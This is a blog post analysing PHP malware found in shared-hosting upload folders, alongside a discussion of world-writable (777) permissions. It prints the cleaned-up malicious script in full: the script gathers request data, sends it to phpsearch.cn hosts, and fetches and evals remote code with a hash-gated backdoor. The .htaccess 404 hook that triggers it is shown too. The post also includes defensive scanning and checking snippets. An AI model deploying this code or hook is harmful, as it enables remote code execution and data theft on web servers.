I was running a routine backup job for a client’s website hosted on Exabytes the other day and noticed something funny. The upload folders were supposed to contain only image, PDF, and video files, but there were also .htaccess and PHP files in the main upload folder and in each of its subfolders.

The first thing that crossed my mind was that my code was not secure enough. It’s difficult to handle Flash upload security, so I had used only the most basic techniques to prevent illegal uploads. However, I decided to venture into Internet Webhosting’s server (I also have an account there) and saw the same thing happening in a fellow blogger’s WordPress upload folder, which coincidentally is on the same server as my other account. I have so many “other” accounts that I sometimes lose track.

Testing further, I found that I am able to manipulate files located in other users’ upload folders if the permission is set to 777 (drwxrwxrwx). I was able to create new files, move existing files, and, even worse, delete them. Technically this is because the web server process (usually named apache or httpd, depending on how Apache was packaged) most often runs as the user nobody or another common user account on the server. So it really does not matter whose PHP file is run from the browser: every script executes as that same shared user, and the server treats it as having the proper permission.
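To see whether one of your own folders is exposed this way, a minimal sketch like the following checks the "other" write bit. It assumes a Unix-like host, and `isWorldWritable` is a hypothetical helper name, not something from the code I used for testing.

```php
<?php
// Hypothetical helper: report whether "other" users may write to a directory.
function isWorldWritable(string $dir): bool
{
    // Make sure we read fresh permissions, not a cached stat result.
    clearstatcache(true, $dir);
    $perms = fileperms($dir);
    if ($perms === false) {
        throw new RuntimeException("Cannot read permissions of $dir");
    }
    // 0002 is the write bit for "other" (the last w in drwxrwxrwx).
    return ($perms & 0002) !== 0;
}

// Demonstration on a throwaway directory in the system temp folder.
$dir = sys_get_temp_dir() . '/upload-demo-' . uniqid();
mkdir($dir);

chmod($dir, 0777);
$open = isWorldWritable($dir);   // folder as many upload scripts require it

chmod($dir, 0755);
$closed = isWorldWritable($dir); // same folder without the "other" write bit

rmdir($dir);
```

With 777 the check reports the folder as writable by everyone, which includes the shared web server user that every other customer's scripts run as.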

So on a typical shared host, other users are actually able to copy your source code if you’re running custom code (in contrast to WordPress, which is publicly available anyway).

This problem does not relate to other parts of the website or the database.

I am NOT going to post the code I used to check and test these claims, so it’s really up to you whether or not to trust me.

However, the following code was in the foreign PHP files (they were named using numbers: XXXXX.php). It was all on one line, most probably to prevent people from understanding it. I cleaned it up to improve readability:

    <?php
    error_reporting(0);
    $a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
    $b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
    $c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
    $d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
    $e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
    $f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
    $g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
    $h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
    $i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
    $j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);

    $z = "/?" . base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".e." . base64_encode($i) . "." . base64_encode($j);
    $f = base64_decode("cGhwc2VhcmNoLmNu");
    if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"]) == "51e1225f5f7bca58cb02a7cf6a96dddd")
        $f = $_REQUEST["id"];
    if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));
    else if($c = file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
        eval($c);
    else
    {
        $cu = curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
        curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
        $o = curl_exec($cu);
        curl_close($cu);
        eval($o);
    };
    ?>

Lines 3-12 collect data about the request.

Line 14 base64-encodes each collected value and joins them all, separated by dots, into the variable $z.
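To make the format of $z concrete, here is a small sketch that reverses it. `decodePayload` is a hypothetical helper and the sample values are made up; the only things taken from the script are the leading "/?", the dot separators, and the literal "e" marker between the fields.

```php
<?php
// Hypothetical helper: split a "/?field.field.e.field" payload and decode each field.
function decodePayload(string $z): array
{
    $query = substr($z, 2); // drop the leading "/?"
    $fields = [];
    foreach (explode('.', $query) as $part) {
        // The script inserts a literal "e" between fields; it is not base64 data,
        // so it is kept unchanged. Base64 output never contains a dot, which is
        // why splitting on "." is safe.
        $fields[] = ($part === 'e') ? $part : base64_decode($part);
    }
    return $fields;
}

// Made-up sample with three encoded values around the marker.
$sample = '/?' . base64_encode('example.com')
        . '.' . base64_encode('/missing.jpg')
        . '.e.' . base64_encode('en-US');

$decoded = decodePayload($sample);
print_r($decoded);
```

In other words, base64 here is only packaging. Anyone who sees the request can read the host name, the requested URI, the visitor's IP address, and everything else the script collected.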

On line 15, $f (which held the referer until it was copied into $z) is overwritten with the domain of the culprit: phpsearch.cn

    print base64_decode('cGhwc2VhcmNoLmNu');

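Lines 16-17 look like a backdoor: if the script itself is requested directly and the q request parameter matches the hard-coded MD5 hash, $f is replaced with the id request parameter, so a different domain can be supplied (I think this is for requests that come from them).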
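The condition on those two lines can be tried out in isolation. This is only a sketch: `isOverrideRequest` is a hypothetical name, and the path, the password, and its hash are made up, since I do not know what value produces the hash in the real file.

```php
<?php
// Hypothetical helper mirroring the condition on lines 16-17 of the script.
function isOverrideRequest(string $requestUri, string $scriptFilename, array $request, string $expectedMd5): bool
{
    return basename($requestUri) == basename($scriptFilename)
        && isset($request['q'])
        && md5($request['q']) == $expectedMd5;
}

$script  = '/home/user/public_html/uploads/12345.php'; // made-up path
$hash    = md5('example-password');                     // made-up secret
$request = ['q' => 'example-password'];

// The script is requested directly and the secret matches.
$direct = isOverrideRequest('/uploads/12345.php', $script, $request, $hash);

// A visitor asked for a missing file and reached the script through the 404 handler.
$via404 = isOverrideRequest('/uploads/missing.jpg', $script, $request, $hash);

// Direct request, but the URI carries a query string, so the basenames differ.
$withQuery = isOverrideRequest('/uploads/12345.php?q=example-password', $script, $request, $hash);

var_dump($direct, $via404, $withQuery);
```

Only the first case passes. The third one suggests the parameters would have to arrive some other way than the query string (a POST body, for instance), because basename() keeps the query string as part of the name.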



Line 18 tries to include the remote file http://ads1.phpsearch.cn/?(collected_data)

    print base64_decode('aHR0cDovL2FkczEu');

Line 19 tries to load the remote file http://7.phpsearch.cn/?(collected_data)

    print base64_decode('aHR0cDovLzcu');

And the final attempt, in lines 23-27, uses the cURL extension to load http://71.phpsearch.cn/?(collected_data)

    print base64_decode('aHR0cDovLzcxLg==');
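The three attempts are fallbacks for different server configurations. In PHP, including a remote URL needs both the allow_url_fopen and allow_url_include settings, file_get_contents() on a URL needs allow_url_fopen, and the last attempt needs the cURL extension. A rough sketch for checking which of the three could work on a given host (`remoteLoaders` is a hypothetical helper name):

```php
<?php
// Hypothetical helper: which of the script's three loading methods could work here?
function remoteLoaders(): array
{
    // ini_get() returns strings such as "1", "", "On" or "Off"; normalise to bool.
    $flag = static function (string $name): bool {
        return filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN);
    };

    $urlFopen = $flag('allow_url_fopen');

    return [
        // Remote include needs both settings enabled.
        'include'           => $urlFopen && $flag('allow_url_include'),
        // Reading a URL as a file needs only allow_url_fopen.
        'file_get_contents' => $urlFopen,
        // The final fallback needs the cURL extension to be loaded.
        'curl'              => function_exists('curl_init'),
    ];
}

$loaders = remoteLoaders();
print_r($loaders);
```

If all three come back false, the uploaded file cannot pull in its remote code on that host, although it is still sitting in the folder.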

How is this possible? Well, they also uploaded .htaccess files that look like this:

    Options -MultiViews
    ErrorDocument 404 //path/to/upload/folder/subfolder/XXXXXX.php

And yes, it only activates when a 404 (file not found) is encountered in that folder. But still, I don’t like the intrusion. Would you?
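If you want to check your own upload folders for the same thing, a minimal sketch along these lines lists every .htaccess and .php file below a folder. `findSuspiciousFiles` is a hypothetical helper, and it assumes the folder should hold nothing but media files, as mine were supposed to.

```php
<?php
// Hypothetical helper: list .htaccess and .php files anywhere below an upload folder.
function findSuspiciousFiles(string $root): array
{
    $hits = [];
    // SKIP_DOTS only skips "." and "..", so dotfiles such as .htaccess are still visited.
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iterator as $file) {
        $name = $file->getFilename();
        $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        if ($file->isFile() && ($name === '.htaccess' || $ext === 'php')) {
            $hits[] = $file->getPathname();
        }
    }
    sort($hits);
    return $hits;
}

// Usage from the command line: php scan.php /path/to/upload/folder
if (isset($argv[1])) {
    print_r(findSuspiciousFiles($argv[1]));
}
```

This only reports files; deciding whether a hit is legitimate (some applications do ship their own .htaccess) is still up to you.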



I can’t really think of any workaround to the permission problem, as users will always have to change the permission of the upload folder to 777. Even changing the group ownership to the group used by the httpd process will not prevent access by other users.

However, GoDaddy seems to have a good technique for overcoming this problem, as I can’t access other users’ folders there. I have wanted to find out how they implemented this for a while; I noticed it the first time I used their hosting, since I didn’t have to change permissions for my upload folders.